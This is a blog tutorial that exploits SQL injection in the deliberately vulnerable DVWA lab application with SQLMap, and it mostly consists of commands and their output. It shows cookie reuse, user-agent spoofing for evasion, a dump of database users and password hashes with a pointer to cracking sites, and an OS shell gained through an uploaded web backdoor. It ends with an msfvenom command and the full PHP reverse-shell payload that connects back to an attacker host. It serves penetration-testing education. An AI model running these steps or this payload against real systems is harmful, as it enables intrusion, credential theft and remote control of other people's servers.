Continuing SQL Injection with SQLMap - Exploitation

A while back, I created this post on performing SQL injection manually. In this post, we take advantage of one of the most common tools used for SQL injection. In the next two posts, we will perform, log and packet analysis to detect the activity performed by SQLMap.

To take advantage of the web application, the attacker has to at least understand the basic operation of the application. For this post, we will use the Dam Vulnerable Web Application (DVWA) and its SQLi injection.

When we first access the application, we are provided with a login screen. The default credentials are username "admin" and password "password". In this example, our URL is "http://10.0.0.108/dvwa/login.php"

Once we login and navigate to the SQLi page and enter a value of "1", we get:

Now that we know that entering "1" returned some results, what would happen if we entered a single tick such as ' ?  The server returns the following error:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1

From above, we can conclude this site maybe vulnerable to SQL injection attacks. Let's run a test using SQLMap. 

If we look at the URL, from the legitimate request, we see:

http://10.0.0.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

From above, we see two parameters. These are "id" and "submit". Let's now use these with SQLMap.

When we execute SQLMap, we get:

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.6#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:58:49 /2020-06-24/

[10:58:50] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.0.0.108:80/dvwa/login.php'. Do you want to follow? [Y/n]n

Above we see we are being redirected back to the login page 'http://10.0.0.108:80/dvwa/login.php'. Probably would be a bit difficult for us to authenticate from the command line and get back to that page. Fortunately for us, we can use the "--cookie" argument. 

Considering we loged into the application before, we can basically reuse that cookie. Alternatively, if you have another user's cookie, you may be able to authenticate with that also. Let's use the cookie. 

To find the cookie to use, I "right clicked" on the page in question (remember I had logged in before), selected "Inspect" and then selected the "Console" tab. Once in the console, I executed "document.cookie". This returned a cookie of "security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0"

Now that we have the cookie, let's use it with SQLMap. Let's also use the opportunity to flush any previous session information for the current target, by using the "--flush-session".

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:18:19 /2020-06-24/

[11:18:20] [INFO] testing connection to the target URL
[11:18:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:18:21] [INFO] testing if the target URL content is stable
[11:18:21] [INFO] target URL content is stable
[11:18:21] [INFO] testing if POST parameter 'id' is dynamic
[11:18:22] [WARNING] POST parameter 'id' does not appear to be dynamic
[11:18:22] [INFO] heuristic (basic) test shows that POST parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:18:22] [INFO] heuristic (XSS) test shows that POST parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:18:22] [INFO] testing for SQL injection on POST parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
.... <truncated for brevity> .....
11:20:35] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
.... <truncated for brevity> .....

Looks like we are now able to confirm there is a vulnerability, which we may be able to take advantage of. We can see this above from the 3 lines in bold. 

Now that we know this works, let's enumerate the "banner" via "--banner" argument. We will also use the "--batch" option as there is no need for user input at this time. Additionally, as it was reported above "looks like the back-end DBMS is 'MySQL'". Let's specify this via "--dbms="MySQL"

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --banner
.... <truncated for brevity> .....

---
[12:12:56] [INFO] the back-end DBMS is MySQL
[12:12:56] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.1.30-MariaDB'
[12:12:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:12:57 /2020-06-24/

From above, we see the backend database is "MySQL >= 5.0 (MariaDB fork)". Specifically we see the banner "banner: '10.1.30-MariaDB'". 

At this point we can hunt the internet to find vulnerabilities associated with "10.1.30-MariaDB'"

Let's continue this journey. However, before we enumerate the current user ("--current-user"), let's make an attempt to blend in. By default, the version of SQLMap I am using uses a user-agent of "sqlmap/1.4.6#stable (http://sqlmap.org)". Let's make this look like a normal browser by leveraging the "--user-agent" argument.  Let's borrow a user-agents from WhatIsMyBrowser.com. Specifically, let's take the "Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" user-agent.

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --user-agent="Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" --current-user

.... <truncated for brevity> .....

---
[12:28:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:28:56] [INFO] fetching current user
current user: 'root@localhost'
[12:28:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:28:56 /2020-06-24/

Above, we see  "current user: 'root@localhost'". Never a good thing to run a program as "root". Maybe this will work to our benefit later.

Ok, above it was cool that we can specify a user-agent. How about instead of specifying one, we let SQLMap just do this on its own. As we look to enumerate the current database ("--current-db"), let's also use the "--random-agent".

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --current-db
....

[12:34:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu' from file '/usr/share/sqlmap/data/txt/user-agents.txt'

.... <truncated for brevity> .....

---
[12:35:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:35:05] [INFO] fetching current database
current database: 'dvwa'
[12:35:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:35:05 /2020-06-24/

We see above that a user agent was selected from the file "user-agents.txt" along with "current database: 'dvwa'". Let's see what other databases might existing or that we may have access to using "--dbs"

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --dbs

.... <truncated for brevity> .....

---
[12:41:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:41:29] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mysql
[*] nowasp
[*] performance_schema
[*] phpmyadmin
[*] test

Above we see a list of databases available. Looks like we can have fun with some of these. However, let's stick with "dvwa" at this time. We already know that the current user is "root@localhost". Let's see if this user is also a database administrator via "--is-dba"

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --is-dba

.... <truncated for brevity> .....
---
[12:45:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:45:12] [INFO] testing if current user is DBA
[12:45:12] [INFO] fetching current user
current user is DBA: True
[12:45:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:45:13 /2020-06-24/

Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges". 

Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges". 

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --privileges
.... <truncated for brevity> .....
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:49:51] [INFO] fetching database users privileges
database management system users privileges:
[*] ''@'localhost' [1]:
    privilege: USAGE
[*] 'pma'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

[12:49:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:49:51 /2020-06-24/


Liking the program which has been made so far, let's now look at the roles of the various users via "--roles"

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --roles

<.... truncated for brevity ..... >
[12:51:48] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (X11; Linux i686; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt


12:52:16] [INFO] fetching database users privileges
database management system users roles:
[*] ''@'localhost' [1]:
    role: USAGE
[*] 'pma'@'localhost' [1]:
    role: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE

[12:52:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:52:16 /2020-06-24/

With the above, we are able to infer who are the users of this system based on the query we made for privileges. However, let's confirm the users via "--users". 

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent --users
<... truncated for brevity ...>
---
[12:59:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:59:59] [INFO] fetching database users
database management system users [5]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

[12:59:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:59:59 /2020-06-24/

Let's now look at grabbing the passwords via "--password". Let's also remove the "--batch" option. This allows us to now interact with SQLMap.

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --random-agent --passwords

<... truncated for brevity ...>


[13:04:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:04:09] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] 
[13:04:27] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL

[13:04:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:04:27 /2020-06-24/

Let's now look at the tables within the various databases.

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --tables

---
[13:17:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:17:56] [INFO] fetching database names
[13:17:56] [INFO] fetching tables for databases: 'dvwa, information_schema, mysql, nowasp, performance_schema, phpmyadmin, test'                                                                                                                        
Database: dvwa
[2 tables]
+----------------------------------------------------+
| guestbook                                          |
| users                                              |
+----------------------------------------------------+

Database: information_schema
[78 tables]
+----------------------------------------------------+
| ALL_PLUGINS                                        |
| APPLICABLE_ROLES                                   |
<.... truncated for brevity .... >
| STATISTICS                                         |
| TABLES                                             |
+----------------------------------------------------+

Database: mysql
[34 tables]
+----------------------------------------------------+
| db                                                 |
| event                                              |
| user                                               |
<.... truncated for brevity .... >
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+

Database: nowasp
[13 tables]
+----------------------------------------------------+
| accounts                                           |
| balloon_tips                                       |
| blogs_table                                        |
<.... truncated for brevity .... >
| user_poll_results                                  |
| youtubevideos                                      |
+----------------------------------------------------+

Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
<.... truncated for brevity .... >
| users                                              |
+----------------------------------------------------+

Database: phpmyadmin
[19 tables]
+----------------------------------------------------+
| pma__bookmark                                      |
| pma__central_columns                               |
<.... truncated for brevity .... >
| pma__users                                         |
+----------------------------------------------------+

[13:17:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:17:57 /2020-06-24/

While the information above is truncated, you can see we have basically dumped all the tables from the various databases. We can now focus on a specific table structure by executing "-D" for the specific database and "-T" for the specific table and "--column" 

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa -T users --columns

---
[13:29:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:29:19] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| user_id      | int(6)      |
+--------------+-------------+

[13:29:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:29:19 /2020-06-24/

Let's now read all records within the "users" table within the "dvwa" database via "--sql-query".

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa --sql-query="select * from users"

<.... truncated for brevity ....>

---
[13:33:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:33:52] [INFO] fetching SQL SELECT statement query output: 'select * from users'
[13:33:52] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[13:33:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[13:33:52] [INFO] fetching current database
[13:33:52] [INFO] fetching columns for table 'users' in database 'dvwa'
[13:33:52] [INFO] the query with expanded column name(s) is: SELECT `password`, `user`, avatar, failed_login, first_name, last_login, last_name, user_id FROM users
select * from users [5]:
[*] 5f4dcc3b5aa765d61d8327deb882cf99, admin, http://localhost/DVWA/hackable/users/admin.jpg, 0, admin, 2018-02-05 01:58:15, admin, 1
[*] e99a18c428cb38d5f260853678922e03, gordonb, http://localhost/DVWA/hackable/users/gordonb.jpg, 0, Gordon, 2018-02-05 01:58:15, Brown, 2
[*] 8d3533d75ae2c3966d7e0d4fcc69216b, 1337, http://localhost/DVWA/hackable/users/1337.jpg, 0, Hack, 2018-02-05 01:58:15, Me, 3
[*] 0d107d09f5bbe40cade3de5c71e9e9b7, pablo, http://localhost/DVWA/hackable/users/pablo.jpg, 0, Pablo, 2018-02-05 01:58:15, Picasso, 4
[*] 5f4dcc3b5aa765d61d8327deb882cf99, smithy, http://localhost/DVWA/hackable/users/smithy.jpg, 0, Bob, 2018-02-05 01:58:15, Smith, 5

[13:33:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:33:52 /2020-06-24/

With the information returned above, we can crack the passwords using another tool or simply copy and paste them into crackstation.net.

At this point, there are many other things for us to do, such as reading and writing of files, etc. However, let's attempt to gain access to the underlying operating system via the "--os-shell" command.

kali@securtynik:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent -D dvwa --os-shell

<.... Truncated for brevity ....>
---
[13:42:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:42:17] [INFO] going to use a web backdoor for command prompt
[13:42:17] [INFO] fingerprinting the back-end DBMS operating system
[13:42:18] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP

From above, we select "[4] PHP"

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] 
[13:43:20] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 4

Next I selected a brute force search to upload the file to grant us shell. As can be seen below, various locations are being tried and the files were ultimately uploaded.

use any additional custom directories [Enter for None]: 
[13:49:55] [WARNING] unable to automatically parse any web server path
[13:49:55] [INFO] trying to upload the file stager on '/xampp/' via LIMIT 'LINES TERMINATED BY' method
[13:49:55] [WARNING] unable to upload the file stager on '/xampp/'
[13:49:55] [INFO] trying to upload the file stager on '/xampp/' via UNION method
[13:49:55] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:49:55] [INFO] the remote file '/xampp/tmpufnkt.php' is larger (701 B) than the local file '/tmp/sqlmaptm_zmipy4631/tmpdhp84kj_' (700B)                                                                                                  ...
[15:52:35] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[15:52:35] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php
[15:52:36] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpbfkst.php
[15:52:36] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> 

.... above we see the "os-shell>" and "the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php".

Testing the shell we see:

BREAK          Sets or clears extended CTRL+C checking.
BCDEDIT        Sets properties in boot database to control boot loading.
CACLS          Displays or modifies access control lists (ACLs) of files.
CALL           Calls one batch program from another.
CD             Displays the name of or changes the current directory.
CHCP           Displays or sets the active code page number.
CHDIR          Displays the name of or changes the current directory.
CHKDSK         Checks a disk and displays a status report.
CHKNTFS        Displays or modifies the checking of disk at boot time.
CLS            Clears the screen.
CMD            Starts a new instance of the Windows command interpreter.
< ... truncated for brevity .... >
VOL            Displays a disk volume label and serial number.
XCOPY          Copies files and directory trees.
WMIC           Displays WMI information inside interactive command shell.

For more information on tools see the command-line reference in the online help.
---
os-shell> 

Looking at the processes on the system via "wmic process list brief"

os-shell> wmic process list brief
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
HandleCount  Name                       Priority  ProcessId  ThreadCount  WorkingSetSize  
0            System Idle Process        0         0          2            8192            
1974         System                     8         4          99           139264          
52           smss.exe                   11        312        2            987136          
<.... Truncated for brevity .... >   
276          taskhostw.exe              8         1732       4            17592320        
193          svchost.exe                8         5576       4            7356416         
62           cmd.exe                    8         4332       2            3862528         
108          conhost.exe                8         4996       3            10129408        
192          WMIC.exe                   8         5076       6            11042816        
157          WmiPrvSE.exe               8         6520       9            8593408 
....

Look at the user on the system.

---
os-shell> wmic useraccount
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
AccountType  Caption                             Description                                                                                      Disabled  Domain           FullName  InstallDate  LocalAccount  Lockout  Name                PasswordChangeable  PasswordExpires  PasswordRequired  SID                                           SIDType  Status    
512          SECURITYNIK-WIN\Administrator       Built-in account for administering the computer/domain                                           FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Administrator       TRUE                FALSE            TRUE              S-1-5-21-3846991316-327138358-508696823-500   1        OK        
512          SECURITYNIK-WIN\DefaultAccount      A user account managed by the system.                                                            TRUE      SECURITYNIK-WIN                         TRUE          FALSE    DefaultAccount      TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-503   1        Degraded  
512          SECURITYNIK-WIN\Guest               Built-in account for guest access to the computer/domain                                         TRUE      SECURITYNIK-WIN                         TRUE          FALSE    Guest               FALSE               FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-501   1        Degraded  
512          SECURITYNIK-WIN\SecurityNik                                                                                                          FALSE     SECURITYNIK-WIN                         TRUE          FALSE    SecurityNik         TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-1002  1        OK        
512          SECURITYNIK-WIN\Toronto                                                                                                              FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Toronto             TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-1005  1        OK        
512          SECURITYNIK-WIN\WDAGUtilityAccount  A user account managed and used by the system for Windows Defender Application Guard scenarios.  TRUE      SECURITYNIK-WIN                         TRUE          FALSE    WDAGUtilityAccount  TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-504   1        Degraded  

---

Grab "systeminfo "

os-shell> systeminfo
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---

Host Name:                 SECURITYNIK-WIN
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
...
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \SECURITYNIK-WIN
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB4053577
                           [02]: KB4054517
Network Card(s):           2 NIC(s) Installed.
                           [01]: Microsoft KM-TEST Loopback Adapter
                                 Connection Name: Npcap Loopback Adapter
                                 DHCP Enabled:    Yes
                                 DHCP Server:     255.255.255.255
                                 IP address(es)
                                 [01]: 169.254.149.255
                                 [02]: fe80::18f0:70a4:4f2c:95ff
                           [02]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.0.100
                                 IP address(es)
                                 [01]: 10.0.0.108
                                 [02]: fe80::a858:9eed:630a:53f7
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

With the information above, we can consider the additional devices in the network to pivot to.

There are other cool things we can do with "wmic" in this "os-shell". However, let's transition back to our attacking machine and use the penetration tester's favourite tool to make things more interesting.

Let's start off with "msfvenom". In my example, I redirect the output to a file call named "tmp.php"

kali@securtynik:~$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.107 LPORT=4443 --format raw --smallest > tmp.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes

If I "cat" the file "tmp.php", we see:

kali@securtynik:~$ cat tmp.php 
/*<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

